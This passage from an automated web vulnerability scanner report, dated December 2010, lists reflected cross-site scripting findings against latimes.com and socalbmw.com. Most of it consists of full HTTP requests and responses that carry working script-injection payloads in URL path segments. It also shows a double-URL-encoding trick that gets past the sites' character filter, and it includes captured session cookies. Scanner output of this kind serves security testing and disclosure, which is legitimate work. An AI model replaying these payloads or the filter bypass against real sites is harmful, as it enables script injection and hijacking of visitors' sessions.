ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html X-Instance-Name: i6s29z1n1 Content-Location: /signon/login-landing.jsp Expires: Sun, 12 Dec 2010 18:55:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101314
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20bbe"><script>alert(1)</script>3f2af118913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site/registration20bbe"><script>alert(1)</script>3f2af118913/logout.register HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html X-Instance-Name: i6s29z2n1 Content-Location: /signon/login-landing.jsp Expires: Sun, 12 Dec 2010 18:55:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101444
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d98f0"><script>alert(1)</script>d3564563da1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servicesd98f0"><script>alert(1)</script>d3564563da1/site/registration/show-createprofile.register HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html X-Instance-Name: i6s28z1n1 Content-Location: /signon/login-landing.jsp Expires: Sun, 12 Dec 2010 18:55:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101475
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ce5"><script>alert(1)</script>1a2d36366e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site29ce5"><script>alert(1)</script>1a2d36366e1/registration/show-createprofile.register HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html X-Instance-Name: i6s28z2n1 Content-Location: /signon/login-landing.jsp Expires: Sun, 12 Dec 2010 18:55:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101475
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb866"><script>alert(1)</script>0374a69d91e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site/registrationfb866"><script>alert(1)</script>0374a69d91e/show-createprofile.register HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html X-Instance-Name: i6s27z2n1 Content-Location: /signon/login-landing.jsp Expires: Sun, 12 Dec 2010 18:55:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101345
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5af2"><script>alert(1)</script>fd602a293bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servicesd5af2"><script>alert(1)</script>fd602a293bd/site/registration/show-login.register HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html X-Instance-Name: i6s29z1n1 Content-Location: /signon/login-landing.jsp Expires: Sun, 12 Dec 2010 18:55:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101338
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de95b"><script>alert(1)</script>66003bbb14c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/sitede95b"><script>alert(1)</script>66003bbb14c/registration/show-login.register HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html X-Instance-Name: i6s27z1n1 Content-Location: /signon/login-landing.jsp Expires: Sun, 12 Dec 2010 18:55:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101297
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18fd0"><script>alert(1)</script>facb52be5ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/site/registration18fd0"><script>alert(1)</script>facb52be5ee/show-login.register HTTP/1.1 Host: www.latimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dkdigcomicskingdomportal%252Ckdigcomics%252Ckdigglobal%253D%252526pid%25253Dlatimes%2525253Alanding%2525253A12/12/2010%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bwindow.location.href%2525253D%25252527/shopping/circular/target%25252527%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DDIV%2526tribglobal%253D%252526pid%25253DLatimes.com%25252520%2525252F%25252520groupondailydeal%25252520%2525252F%25252520signup%25252520-%25252520Front.%252526pidt%25253D1%252526oid%25253Djavascript%2525253Acarnival.modal.dropit%252528%252529%2525253B%252526ot%25253DA%3B; __utmz=1.1292179232.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=tribglobal%3D%2526pid%253DLatimes.com%252520%25252F%252520games%252520-%252520Front.%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bwindow.location.href%25253D'%25252Fshopping%25252Fcircular%25252Ftarget'%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; mainPage=/; s_dslv_s=First%20Visit; ebPanelFrequency_.www.latimes.com=4208627%3A2%3A1%3A1292265575065; ENT=SecCookie=F3D270D548318536C2D77FE54B7297C5A15CC9E220DF52CD40A38E513BAB20AF60764680ADCC1F1E6A2900BE611A92B27DC52D36B8C1F7ECC1A386D3BFEE185C86F1C592E76AC8170A88309F35904BEDB6BA57A4B930C21B0FA365FE8389094B06FA2853D6238FD5EDC3B0CC71F10736AA4DFDE3A22A40DCC07A8F862622F94E2AF8CE5410A013A27659229D4B6F26EA5011591849E06DAAB36CF852DA3729069666EEBE00D98825E2E5E3657B098FD938BE19BDADB11752EB9DE98188A83770C4A1EA71FAF4848D7260CF5424B47B7F532FB39E1C0CE4EB; s_dslv=1292179324762; rsi_segs=; s_cc=true; enqp=wzl1pclnc9stwdnqzdxs9hiyphrgipcl; __utma=1.250572545.1292179232.1292179232.1292179232.1; enqs=u2can9gzyq2chxql0em0p488hpihcpl1; s_path=current; __utmc=1; __utmb=1.1.10.1292179232; ebNewBandWidth_.www.latimes.com=338%3A1292179190797;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE" Content-Type: text/html X-Instance-Name: i6s27z2n1 Content-Location: /signon/login-landing.jsp Expires: Sun, 12 Dec 2010 18:55:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 18:55:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 101291
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a68df%253cscript%253ealert%25281%2529%253c%252fscript%253e4ebb6ab4d2f was submitted in the REST URL parameter 2. This input was echoed as a68df<script>alert(1)</script>4ebb6ab4d2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Finance/financeoffers.aspxa68df%253cscript%253ealert%25281%2529%253c%252fscript%253e4ebb6ab4d2f HTTP/1.1 Host: www.socalbmw.com Proxy-Connection: keep-alive Referer: http://www.latimes.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:45:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=csp02w55on2d2x55hug3bf45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150561
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87cba%253cscript%253ealert%25281%2529%253c%252fscript%253ebd3336606aa was submitted in the REST URL parameter 1. This input was echoed as 87cba<script>alert(1)</script>bd3336606aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ScriptResource.axd87cba%253cscript%253ealert%25281%2529%253c%252fscript%253ebd3336606aa HTTP/1.1 Host: www.socalbmw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=117788043.1292179244.1.1.utmcsr=latimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=%5B%5BB%5D%5D; s_nr=1292179309502; __utma=117788043.203287789.1292179244.1292179244.1292179244.1; __utmc=117788043; __utmb=117788043.1.10.1292179244; SC_LINKS=%5B%5BB%5D%5D; ASP.NET_SessionId=fdoqis34aku3zzipdibjukuj;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 18:51:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 150531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload da593%253cscript%253ealert%25281%2529%253c%252fscript%253e1fba3c56ae9 was submitted in the REST URL parameter 5. This input was echoed as da593<script>alert(1)</script>1fba3c56ae9 in the application's response.
